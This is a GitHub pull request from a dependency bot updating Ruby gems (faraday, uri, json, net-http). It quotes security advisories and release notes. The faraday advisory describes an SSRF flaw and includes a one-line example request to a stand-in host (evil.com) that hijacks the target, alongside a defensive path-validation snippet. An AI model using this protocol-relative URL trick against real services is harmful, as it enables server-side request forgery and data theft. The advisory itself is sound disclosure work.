Skip to content

🚨 [security] [ruby] Update faraday 2.13.4 → 2.14.1 (minor) #298

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom
Open
depfu wants to merge 1 commit into
base: main
Choose a base branch
from
Open

🚨 [security] [ruby] Update faraday 2.13.4 → 2.14.1 (minor) #298

depfu wants to merge 1 commit into from
+7 −7

Conversation

@depfu
Copy link
Contributor

@depfu depfu bot commented Feb 9, 2026

🚨 Your current dependencies have known security vulnerabilities 🚨

This dependency update fixes known security vulnerabilities. Please see the details below and assess their impact carefully. We recommend to merge and deploy this as soon as possible!

Here is everything you need to know about this update. Please take a good look at what changed and the test results before merging this pull request.

What changed?

↗️ faraday (indirect, 2.13.4 → 2.14.1) · Repo · Changelog

Security Advisories 🚨

🚨 Faraday affected by SSRF via protocol-relative URL host override in build_exclusive_url

Impact

Faraday's build_exclusive_url method (in lib/faraday/connection.rb) uses Ruby's
URI#merge to combine the connection's base URL with a user-supplied path. Per RFC 3986,
protocol-relative URLs (e.g. //evil.com/path) are treated as network-path references
that override the base URL's host/authority component.

This means that if any application passes user-controlled input to Faraday's get(),
post(), build_url(), or other request methods, an attacker can supply a
protocol-relative URL like //attacker.com/endpoint to redirect the request to an
arbitrary host, enabling Server-Side Request Forgery (SSRF).

The ./ prefix guard added in v2.9.2 (PR #1569) explicitly exempts URLs starting with
/, so protocol-relative URLs bypass it entirely.

Example:

conn = Faraday.new(url: 'https://api.internal.com')
conn.get('//evil.com/steal')
# Request is sent to https://evil.com/steal instead of api.internal.com

Patches

Faraday v2.14.1 is patched against this security issue. All versions of Faraday up to 2.14.0 are affected.

Workarounds

NOTE: Upgrading to Faraday v2.14.1+ is the recommended action to mitigate this issue, however should that not be an option please continue reading.

Applications should validate and sanitize any user-controlled input before passing it to
Faraday request methods. Specifically:

  • Reject or strip input that starts with // followed by a non-/ character
  • Use an allowlist of permitted path prefixes
  • Alternatively, prepend ./ to all user-supplied paths before passing them to Faraday

Example validation:

def safe_path(user_input)
  raise ArgumentError, "Invalid path" if user_input.match?(%r{\A//[^/]})
  user_input
end
Release Notes

2.14.1

Security Note

This release contains a security fix, we recommend all users to upgrade as soon as possible.
A Security Advisory with more details will be posted shortly.

What's Changed

  • Add comprehensive AI agent guidelines for Claude, Cursor, and GitHub Copilot by @Copilot in #1642
  • Add RFC document for Options architecture refactoring plan by @Copilot in #1644
  • Bump actions/checkout from 5 to 6 by @dependabot[bot] in #1655
  • Explicit top-level namespace reference by @c960657 in #1657

New Contributors

  • @Copilot made their first contribution in #1642

Full Changelog: v2.14.0...v2.14.1

2.14.0

What's Changed

New features ✨

Fixes 🐞

Misc/Docs 📄

New Contributors

Full Changelog: v2.13.4...v2.14.0

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 16 commits:

↗️ faraday-net_http (indirect, 3.4.1 → 3.4.2) · Repo · Changelog

Release Notes

3.4.2

What's Changed

  • Use more conservative net-http version constraint by @RDeckard in #53

New Contributors

Full Changelog: v3.4.1...v3.4.2

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 4 commits:

↗️ json (indirect, 2.13.2 → 2.18.1) · Repo · Changelog

Release Notes

2.18.1

What's Changed

  • Fix a potential crash in very specific circumstance if GC triggers during a call to to_json
    without first invoking a user defined #to_json method.

Full Changelog: v2.18.0...v2.18.1

2.18.0

What's Changed

  • Add :allow_control_characters parser options, to allow JSON strings containing unescaped ASCII control characters (e.g. newlines).

Full Changelog: v2.17.1...v2.18.0

2.17.1 (from changelog)

  • Fix a regression in parsing of unicode surogate pairs (\uXX\uXX) that could cause an invalid string to be returned.

2.17.0

What's Changed

  • Improve JSON.load and JSON.unsafe_load to allow passing options as second argument.
  • Fix the parser to no longer ignore invalid escapes in strings.
    Only \", \\, \b, \f, \n, \r, \t and \u are valid JSON escapes.
  • Fixed JSON::Coder to use the depth it was initialized with.
  • On TruffleRuby, fix the generator to not call to_json on the return value of as_json for Float::NAN.
  • Fixed handling of state.depth: when to_json changes state.depth but does not restore it, it is reset
    automatically to its initial value.
    In particular, when a NestingError is raised, depth is no longer equal to max_nesting after the call to
    generate, and is reset to its initial value. Similarly when to_json raises an exception.

Full Changelog: v2.16.0...v2.17.0

2.16.0

What's Changed

  • Deprecate JSON::State#[] and JSON::State#[]=. Consider using JSON::Coder instead.
  • JSON::Coder now also yields to the block when encountering strings with invalid encoding.
  • Fix GeneratorError messages to be UTF-8 encoded.
  • Fix memory leak when Exception is raised, or throw is used during JSON generation.
  • Optimized floating point number parsing by integrating the ryu algorithm (thanks to Josef Šimánek).
  • Optimized numbers parsing using SWAR (thanks to Scott Myron).
  • Optimized parsing of pretty printed documents using SWAR (thanks to Scott Myron).

Full Changelog: v2.15.2...v2.16.0

2.15.2

What's Changed

  • Fix JSON::Coder to have one dedicated depth counter per invocation.
    After encountering a circular reference in JSON::Coder#dump, any further #dump call would raise JSON::NestingError.

Full Changelog: v2.15.1...v2.15.2

2.15.1

What's Changed

  • Fix incorrect escaping in the JRuby extension when encoding shared strings.

Full Changelog: v2.15.0...v2.15.1

2.15.0

What's Changed

  • JSON::Coder callback now receive a second argument to convey whether the object is a hash key.
  • Tuned the floating point number generator to not use scientific notation as aggressively.

Full Changelog: v2.14.1...v2.15.0

2.14.1

What's Changed

  • Fix IndexOutOfBoundsException in the JRuby extension when encoding shared strings.

Full Changelog: v2.14.0...v2.14.1

2.14.0

What's Changed

  • Add new allow_duplicate_key generator options. By default a warning is now emitted when a duplicated key is encountered.
    In json 3.0 an error will be raised. 
    >> Warning[:deprecated] = true
>> puts JSON.generate({ foo: 1, "foo" => 2 })
(irb):2: warning: detected duplicate key "foo" in {foo: 1, "foo" => 2}.
This will raise an error in json 3.0 unless enabled via `allow_duplicate_key: true`
{"foo":1,"foo":2}
>> JSON.generate({ foo: 1, "foo" => 2 }, allow_duplicate_key: false)
detected duplicate key "foo" in {foo: 1, "foo" => 2} (JSON::GeneratorError)
  • Fix JSON.generate strict: true mode to also restrict hash keys.
  • Fix JSON::Coder to also invoke block for hash keys that aren't strings nor symbols.
  • Fix JSON.unsafe_load usage with proc
  • Fix the parser to more consistently reject invalid UTF-16 surogate pairs.

Full Changelog: v2.13.2...v2.14.0

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by more commits than we can show here.

↗️ net-http (indirect, 0.6.0 → 0.9.1) · Repo · Changelog

Release Notes

0.9.1

What's Changed

  • Raise Net::OpenTimeout when TCPSocket.open raises IO::TimeoutError. by @shioimm in #263
  • Freeze more constants for Ractor compatibility by @rhenium in #256

New Contributors

Full Changelog: v0.9.0...v0.9.1

0.9.0

What's Changed

  • open: Never call Timeout.timeout in rescue clause by @osyoyu in #250
  • Fixed by misspell -w -error -source=text by @hsbt in #254
  • Check whether TCPSocket#initialize supports open_timeout once and without exceptions by @eregon in #252
  • Refactor HTTPS tests by @rhenium in #255

New Contributors

Full Changelog: v0.8.0...v0.9.0

0.8.0

Breaking changes

  • Minimum Ruby version raised to 2.7 along with the raise of minimum uri gem version (0.11.1)

What's Changed

  • [DOC] Fix too stopped documentations by @nobu in #244
  • Replace Timeout.timeout with TCPSocket.open(open_timeout:) when available by @osyoyu in #224
  • Replace Ruby 3.5 with Ruby 4.0 by @yahonda in #246
  • Fix handling of IPv6 literal hosts in Net::HTTPGenericRequest by @taketo1113 in #237
    • This fixes compatibility issue with uri gem 1.1.0+, which made relevant validations strict.

New Contributors

Full Changelog: v0.7.0...v0.8.0

0.7.0

What's Changed

  • [DOC] Fix broken rdoc-ref links by @st0012 in #199
  • Don't double-interrupt the test HTTP server by @headius in #197
  • Provide a 'Changelog' link on rubygems.org/gems/net-http by @mark-young-atg in #201
  • Freeze some constants to improve Ractor compatibility by @osyoyu in #206
  • Don't set content type by default by @hsbt in #207
  • Support pretty_print by @nobu in #160
  • Add a workflow to sync commits to ruby/ruby by @k0kubun in #230

New Contributors

Full Changelog: v0.6.0...v0.7.0

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by more commits than we can show here.

↗️ uri (indirect, 1.0.3 → 1.1.1) · Repo · Changelog

Security Advisories 🚨

🚨 URI Credential Leakage Bypass over CVE-2025-27221

Impact

In affected URI version, a bypass exists for the fix to CVE-2025-27221 that can expose user credentials.

When using the + operator to combine URIs, sensitive information like passwords from the original URI can be leaked, violating RFC3986 and making applications vulnerable to credential exposure.

The vulnerability affects the uri gem bundled with the following Ruby series:

  • 0.12.4 and earlier (bundled in Ruby 3.2 series)
  • 0.13.2 and earlier (bundled in Ruby 3.3 series)
  • 1.0.3 and earlier (bundled in Ruby 3.4 series)

Patches

Upgrade to 0.12.5, 0.13.3 or 1.0.4

References

Release Notes

1.1.1

What's Changed

  • Re-allow consecutive, leading and trailing dots in EMAIL_REGEXP by @osyoyu in #189

New Contributors

Full Changelog: v1.1.0...v1.1.1

1.1.0

What's Changed

  • Update to use the latest version of setup-ruby and bump up to Ruby 3.4 by @hsbt in #158
  • Fix the mention to removed URI.escape/URI::Escape by @y-yagi in #146
  • Use a fully qualified name in warning messages by @y-yagi in #150
  • Support Ractor#value by @hsbt in #163
  • Removed unnecessary workaround by @hsbt in #164
  • Escape reserved characters in scheme name by @nobu in #148
  • [DOC] State that uri library is needed to call Kernel#URI by @nobu in #167
  • Prefer dedicated assertion methods by @nobu in #169
  • Fix the message for unexpected argument by @nobu in #171
  • Make URI::regexp schemes case sensitive (#38) by @nobu in #170
  • The local part should not contain leading or trailing dots in the EMAIL_REGEXP by @nlevchuk in #124
  • More checks in EMAIL_REGEXP by @nobu in #172
  • Do not allow empty host names, as they are not allowed by RFC 3986 by @jeremyevans in #116
  • Improve performance of URI::MailTo::EMAIL_REGEXP by @nobu in #173
  • Performance test stability by @nobu in #174
  • Update documents that used URI::Parser by @nobu in #175
  • Add a workflow to sync commits to ruby/ruby by @k0kubun in #183
  • Add irb to the Gemfile to fix the warning by @y-yagi in #182
  • Replace reference to the obsolete URI.escape with URI::RFC2396_PARSER.escape by @vivshaw in #166
  • Switch a parsing behavior completely when switching a parser by @y-yagi in #161
  • improve error message by @soda92 in #130
  • Use generic version number to VERSION by @hsbt in #187

New Contributors

Full Changelog: v1.0.4...v1.1.0

1.0.4

Security fixes

Full Changelog: v1.0.3...v1.0.4

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 71 commits:

Depfu Status

Depfu will automatically keep this PR conflict-free, as long as you don't add any commits to this branch yourself. You can also trigger a rebase manually by commenting with @depfu rebase.

All Depfu comment commands
@​depfu rebase
Rebases against your default branch and redoes this update
@​depfu recreate
Recreates this PR, overwriting any edits that you've made to it
@​depfu merge
Merges this PR once your tests are passing and conflicts are resolved
@​depfu cancel merge
Cancels automatic merging of this PR
@​depfu close
Closes this PR and deletes the branch
@​depfu reopen
Restores the branch and reopens this PR (if it's closed)
@​depfu pause
Ignores all future updates for this dependency and closes this PR
@​depfu pause [minor|major]
Ignores all future minor/major updates for this dependency and closes this PR
@​depfu resume
Future versions of this dependency will create PRs again (leaves this PR as is)

@depfu depfu bot added the depfu label Feb 9, 2026
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

No reviews

Assignees

No one assigned

Labels

depfu

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

0 participants